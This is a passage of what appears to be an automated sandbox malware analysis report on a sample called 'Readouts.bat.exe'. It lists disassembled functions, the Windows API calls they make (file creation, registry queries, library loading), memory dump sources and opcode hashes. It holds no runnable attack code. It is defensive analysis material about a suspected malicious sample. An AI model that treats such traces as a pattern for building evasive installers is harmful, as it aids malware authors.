                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                • Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
                                                • Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                • Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45
                                                Function 00406CDA Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                • Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
                                                • Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                • Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15
                                                Function 004067DF Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                • Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
                                                • Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                • Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55
                                                Function 00406C2D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                • Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
                                                • Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                • Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04
                                                Function 00406D4B Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                • Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
                                                • Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                • Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45
                                                Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                • Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
                                                • Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                • Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45
                                                Function 73CB2A74 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileA.KERNELBASE(00000000), ref: 73CB2B33
                                                • GetLastError.KERNEL32 ref: 73CB2C3A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1886544437.0000000073CB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 73CB0000, based on PE: true
                                                • Associated: 00000000.00000002.1886512898.0000000073CB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886574141.0000000073CB3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886592052.0000000073CB5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73cb0000_Readouts.jbxd
                                                Similarity
                                                • API ID: CreateErrorFileLast
                                                • String ID:
                                                • API String ID: 1214770103-0
                                                • Opcode ID: df1bcf27f4055b589c4682c14bdd172801cfe856bc98ee99f7c3e68ad5a21c49
                                                • Instruction ID: 106c9529e51a99dd9cb0baa4163f3ddd0a06e8bf4b16f1d0976b9e2f69c0cc9e
                                                • Opcode Fuzzy Hash: df1bcf27f4055b589c4682c14bdd172801cfe856bc98ee99f7c3e68ad5a21c49
                                                • Instruction Fuzzy Hash: 4D5150729082DCDFEB21EFA5E985B5A77B9EB44354F224429D40ACF250EB3C9C81CB51
                                                Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp,00000000,00000011,00000002), ref: 00402557
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID:
                                                • API String ID: 3356406503-0
                                                • Opcode ID: 78cb46a17e4604e5fda0a3152fe399088287bee99fe32485d92fc9a21df269c8
                                                • Instruction ID: d0975296e26d4c0b9efdbcb6ea02913ec0c3a4f45bebf2ca255a38b3541a69e3
                                                • Opcode Fuzzy Hash: 78cb46a17e4604e5fda0a3152fe399088287bee99fe32485d92fc9a21df269c8
                                                • Instruction Fuzzy Hash: CF11A731D14205EBDF14DF64CA585AE77B4EF44348F20843FE445B72D0D6B85A41EB5A
                                                Function 00405C61 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                  • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,771B3420,004059B6,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405C12
                                                  • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                  • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                • lstrlenW.KERNEL32(00425EF0,00000000,00425EF0,00425EF0,?,?,771B3420,004059B6,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405CBA
                                                • GetFileAttributesW.KERNELBASE(00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,771B3420,004059B6,?,C:\Users\user~1\AppData\Local\Temp\,771B3420), ref: 00405CCA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID:
                                                • API String ID: 3248276644-0
                                                • Opcode ID: 28137d2b7c79da387a19cc910a57ce3f03d1b4ac0c29095b07e0900cb30f0510
                                                • Instruction ID: 2026245c43f0ab98faeafd35ab7c4279b053bc85bc29d2cdff443752a8830806
                                                • Opcode Fuzzy Hash: 28137d2b7c79da387a19cc910a57ce3f03d1b4ac0c29095b07e0900cb30f0510
                                                • Instruction Fuzzy Hash: 54F0F436109F511AF62233361D09EAF1648CE82328B5A057FF952B26D1CA3C89039CBE
                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                Function 0040665E Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                  • Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                  • Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
                                                  • Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                • Instruction ID: b981dfd93ec331c3b9a34c40441268954a5fd10c61cb517d904db4ec9094c3f9
                                                • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                • Instruction Fuzzy Hash: DFE08C326042116BD7159B70AE4487B63AC9A89650307883EFD4AF2181EB39EC31A66D
                                                Function 00405D7A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Readouts.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                Function 00405838 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
                                                • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                • Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
                                                • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                • Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E
                                                Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                  • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: FilePointerwsprintf
                                                • String ID:
                                                • API String ID: 327478801-0
                                                • Opcode ID: 95ba7574d33027012252503f20e6de7da786a665e35f302a49c950640621c3c4
                                                • Instruction ID: bb989e29a52a93802ac21e82b74e9b17d97bb9506e6cfc7636de57e0f2ab50b5
                                                • Opcode Fuzzy Hash: 95ba7574d33027012252503f20e6de7da786a665e35f302a49c950640621c3c4
                                                • Instruction Fuzzy Hash: B8E09271E14104AFD710DBA5AE0ACBEB7B8DB84318B20403BF201F50D1CA794E118E3E
                                                Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWrite
                                                • String ID:
                                                • API String ID: 390214022-0
                                                • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                Function 0040611F Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
